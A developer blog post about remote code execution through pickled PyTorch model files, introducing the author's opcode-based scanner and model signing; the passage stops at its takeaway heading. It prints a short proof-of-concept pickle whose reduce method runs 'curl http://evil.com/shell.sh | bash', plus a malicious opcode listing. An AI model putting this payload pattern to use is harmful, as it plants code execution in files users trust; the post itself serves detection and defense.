Your PyTorch Model File Can Execute Arbitrary Code — Here's How I Built a Scanner to Detect It

#security #python #machinelearning #pytorch

Every time you run torch.load("model.pt"), you're executing arbitrary Python code. Not "could theoretically execute" — actually executing. The pickle format that
PyTorch uses for serialization has a built-in code execution mechanism, and it's trivial to exploit.

I built a tool to detect this. Here's what I learned.

The Attack: 4 Lines of Code

import pickle, os

class Backdoor:
def reduce(self):
return (os.system, ("curl http://evil.com/shell.sh | bash",))

payload = pickle.dumps(Backdoor())

That's it. When someone loads this pickle — whether it's disguised as a model checkpoint, a dataset, or a config file — the command executes. No warnings. No prompts.
Full RCE.

The reduce method tells pickle how to reconstruct an object. But "reconstruct" means "call this function with these arguments." Any function. Any arguments.

** Why This Matters for ML**

ML models are distributed as serialized files:

PyTorch .pt files are ZIP archives containing pickles
Scikit-learn models are pickled directly
HuggingFace Hub hosts thousands of user-uploaded model files

In 2023, HuggingFace found malicious pickles in uploaded models. This isn't theoretical — it's happening.

How Detection Works: Opcode Disassembly

Python's pickletools module can disassemble pickle bytecode without executing it. Here's what a malicious pickle looks like at the opcode level:

PROTO 4
FRAME 25
SHORT_BINUNICODE 'nt' ← module name (os on Windows)
SHORT_BINUNICODE 'system' ← function name
STACK_GLOBAL ← load nt.system as callable
SHORT_BINUNICODE 'whoami' ← argument
TUPLE1 ← pack into tuple
REDUCE ← CALL the function
STOP

The key insight: STACK_GLOBAL loads a callable by module + name, and REDUCE executes it. If the module is os, subprocess, socket, or builtins — it's malicious.

My Scanner:

I built Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor) to parse these opcodes and flag dangerous patterns:

from src.scanners import scan_pickle_bytes

result = scan_pickle_bytes(suspicious_data)
print(result.risk_level) # "malicious"
print(result.findings) # ["DANGEROUS import: nt.system", "Code execution via REDUCE"]

It handles pickle protocols 0-5, including the protocol 4+ STACK_GLOBAL pattern where module and name are pushed to the stack separately.

What I Got Wrong Initially

On Windows, os.system pickles as nt.system. On Linux, it's posix.system. My first version only checked for os — missed both platform-specific variants. Lesson: always
test on actual bytecode output, not what you think it should be.

The Defense: Model Signing

Detection is reactive. The proactive defense is cryptographic signing:

After training, compute SHA-256 of the model file
Sign the hash with Ed25519
Before loading, verify signature against a trusted public key

If the signature doesn't match, don't load it.

What This Doesn't Solve

Obfuscated payloads — Lambda chains and builtins tricks can evade pattern matching
Semantic backdoors — A model can be backdoored at the weight level without malicious pickle code
SafeTensors — HuggingFace's format eliminates this entire attack class by design. Use it when possible.

The Takeaway:

If you're downloading model files from the internet: